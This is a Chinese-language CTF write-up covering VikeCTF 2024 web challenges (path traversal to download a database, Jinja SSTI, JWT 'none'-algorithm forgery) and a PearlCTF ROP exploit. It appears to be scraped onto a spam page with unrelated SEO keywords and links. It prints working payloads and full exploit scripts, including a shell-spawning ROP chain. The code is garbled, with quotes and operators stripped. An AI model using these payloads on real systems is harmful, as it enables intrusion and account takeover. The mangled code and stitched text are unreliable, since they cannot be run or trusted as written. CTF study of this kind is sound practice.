当前位置: 首页 > news >正文

在线做网站免费黄搞asp.net旅游网站开发文档

在线做网站免费黄搞,asp.net旅游网站开发文档,龙岩长汀小程序开发,大连网络建站公司分析VikeCTF 2024 WP 由于环境原因很多靶场的过程图片没法复现截图。。。 web Ponies 算是一个签到题#xff0c;看到源码这里其实是一个快速跳转的程序#xff0c;我们看到tag.src直接进行访问#xff0c;可以看到源码里面#xff0c;从里面分析拿到flag function recurs…VikeCTF 2024 WP 由于环境原因很多靶场的过程图片没法复现截图。。。 web Ponies 算是一个签到题看到源码这里其实是一个快速跳转的程序我们看到tag.src直接进行访问可以看到源码里面从里面分析拿到flag function recursiveSpawn() {BrowserPonies.spawnRandom(incrementalPonies);if (!BrowserPonies.running()) {counter counter 1;document.getElementById(flag).innerHTML arriving shortly ..repeat(counter % 4);setTimeout(recursiveSpawn, intervalMs);} else {setTimeout(() {var tag document.createElement(script);tag.src /gag.js;document.getElementsByTagName(head)[0].appendChild(tag);}, 7000);} } recursiveSpawn();vikeMERCH 这道题目是go写的并且看的出来考的是一个数据库泄露问题但实际手法是疑似路径穿越。 整体是需要代码审计找到漏洞点我一直没找到以为是search部分注入。 e.GET(/assets, func(c *gin.Context) {id : c.Query(id)path : filepath.Join(assets, filepath.Clean(id))c.File(path) })这里利用filepath.clean来进行路径穿越过滤c.File来进行加载网页。 但这里filepath具有漏洞也可以进行穿越利用 看下例子 package mainimport (fmtpath/filepath )func main() {// Returns: Path: ../db.sqlite3fmt.Printf(Path: %s\n, filepath.Clean(../db.sqlite3))// Returns: Path: Path: /db.sqlite3fmt.Printf(Path: %s\n, filepath.Clean(/../db.sqlite3)) }go语言运行环境 可以看到第一种…/的写法可以造成文件读取 db : sqlx.MustOpen(sqlite3, file:db.sqlite3) 这行代码告诉了我们db.sqlite3在当前相对路径下所以我们就可以读取了 这里学到了新方法用curl直接下载到本地发现外国人很多都习惯于curl指令来获取而不是国人大都直接访问来看。 curl http://35.94.129.106:3001/assets?id../db.sqlite3 --path-as-is -o db.sqlite3拿到文件可以看到里面包含了信息包括admin的密码登陆即可 └─$ curl http://35.94.129.106:3001/admin -d usernameadminpassworda36dc27c2955d4d4ec31f351c49fc7ac63b7e98908077bd1a7f0cfce1875c03d vikeCTF{whY_w0ulD_g0_d0_th15}movieDB 这个题目有两解说难也不难就是有点暗戳戳的看半天以为是sql注入拿信息没想到是细节题 方法一: dirsearch扫目录发现有一个static目录再还有robots.txt发现了static/flag.tx文件访问发现显示是no 这里普及一个知识点不加/是访问文件加/是访问目录。 http://35.94.129.106:3003/static/ - 404 未找到 http://35.94.129.106:3003/static - 目录列表这里就是要访问 http://35.94.129.106:3003/static/flag.txt/- vikeCTF{y0u_tH0Gh7_iT_w4S_5QL_1Nj3c7i0n}但我觉得这个有点莫名奇妙了 有人是这么解释的 在讨论了一番后发现其实是加了个waf拿到源码 app.route(/static/flag.txt) def flag():return no所以这应该是个非预期解当然也像是出题人故意为之因为完全可以避免。 方法二 常规方法应该是利用当然这比赛的时候得靠自己猜测因为是没有源码的 def home():try:search request.args.get(search)if search is None:return render_template_string(index)直接模板注入了 {{lipsum.__globals__.os.popen(cat static/flag.txt).read()}}Jarls Weakened Trust 一个登入框 进去看到这么一句话 Someone with admin permissions will approve your application within the next millenium如果英语可以你就知道他说的是拥有管理员权限的人将在下一个千年内批准您的申请明显像是让我们来更改jwt来获取权限。 思路也是两种 方法一 爆破我用jwt从下午爆到晚上都没结果。。。我都忘记了 方法二 更改签名从H256到none这里推荐网站 https://token.dev/ 但这里有个问题就是生成的签名因为是none你只有一个点你需要在尾部加一个. 不加是这样 加了后就可以看到了 这里原题是要把admin改成True就可以了 这里还有方便的python脚本 import requests import string import random import jwt import rerandom_string lambda length: .join(random.choice(string.ascii_letters) for _ in range(length)) URL http://35.94.129.106:3004/resp requests.post(URLjoin, data{username: random_string(5), password: random_string(5)}, allow_redirectsFalse) jwt_token re.search(r(.*?);, resp.headers[Set-Cookie]).group(1) print(jwt_token)jwt_token jwt.decode(jwt_token, options{verify_signature: False}) jwt_token[admin] True print(jwt_token)jwt_token jwt.encode(jwt_token, key, algorithmNone) print(jwt_token)resp requests.get(URL, cookiesdict(AUTHORIZATIONjwt_token)) flag re.findall(vikeCTF\{.*?\}, resp.text) print(flag)本文大多从 外国的大佬wp 主要以复现学习为主…本次文章仅用记录 [pearl pwn] from pwn import *context.log_level debug elfELF(./adventure) # p process(./adventure) p remote(dyn.ctf.pearlctf.in, 30014) puts_gotelf.got[puts] print(hex(puts_got)) bss 0x404000hatchEgg 0x401223 fflush_got 0x404038pop_rdi 0x000000000040121e pop_rsi_r15 0x0000000000401871 ret 0x000000000040101ap.sendlineafter(bchoice: ,b2) p.sendlineafter(b2. No,b1)pay ba*0x20 p64(bss0x720) pay p64(pop_rdi) p64(puts_got) pay p64(0x401242) # call puts p.sendlineafter(bname,pay)p.recvuntil(bwith ) p.recvline() libc u64(p.recv().ljust(8,b\x00)) -0x080ed0 print(hex(libc)) system libc 0x050d60pay ba*0x11 b/bin/sh\x00 ba*0x8 p64(bss0x720) # getchar() pay p64(pop_rdi) p64(bss0x710) pay p64(ret) pay p64(system) p.sendline(pay) # bss writep.interactive()总结 之前一直觉得外国赛看wp很麻烦虽然题目很好但看不了wp就觉得有点无效所以就不怎么打最近没什么国内比赛又想进阶一下发现外国赛频率很高很多比赛都质量不错discard上的老外也很热情顺便磨练一手英语交流爽了。。。
http://www.pierceye.com/news/893033/

相关文章:

  • 微信小程序做链接网站做catalog的免费网站
  • 呼市网站制作招聘建设网站 托管 费用
  • dede自适应网站模板济南著名网站建设
  • 旅游网站排名榜手机开发网站工具
  • 饰品公司网站建设策划书百度seo优化收费标准
  • wordpress企业建站5网站建设
  • 网站运营解决方案皮具网站设计
  • 地宝网 网站建设上海网站制作网站开发
  • 有哪些出名的工业设计网站做废钢铁生意在哪个网站了解
  • wordpress 根目录函数深圳债务优化公司
  • 基于android的app的设计与开发seo链接优化
  • 怎么用优盘做网站登录密钥百度收录网站名字
  • 网站制作的一般步骤网站域名备案需要多长时间
  • 运城市住房与城乡建设局网站郑州百姓网招聘
  • 网站调用网页怎么做重庆手机网站方案设计
  • 购物 网站建设的市场分析泰兴网站建设吧
  • 企业网站代运营微信网页登录wordpress
  • 专业网站制作流程深圳市 网站建设450
  • 怎么做加盟网站海南网站搭建外包
  • 没有网站可以做落地页网站体验方案
  • 重庆便宜做网站的网站内容注意事项
  • 温岭手机网站建设企业网站建设遵循的原则
  • 美丽乡村 村级网站建设wordpress地图主题
  • 做双语网站多少钱建立设计网站富阳
  • 为什么有网网站打不开怎么回事网站怎样添加友情链接
  • 中国五码一级做爰网站wordpress去掉评论注册
  • 网站备案修改域名贵阳仿站定制模板建站
  • 渭南 网站集约化建设淘宝网站开发技术名称
  • 临沂做网站费用wordpress新浪微博图床插件
  • 游戏网站建设收费明细WordPress 中英文翻译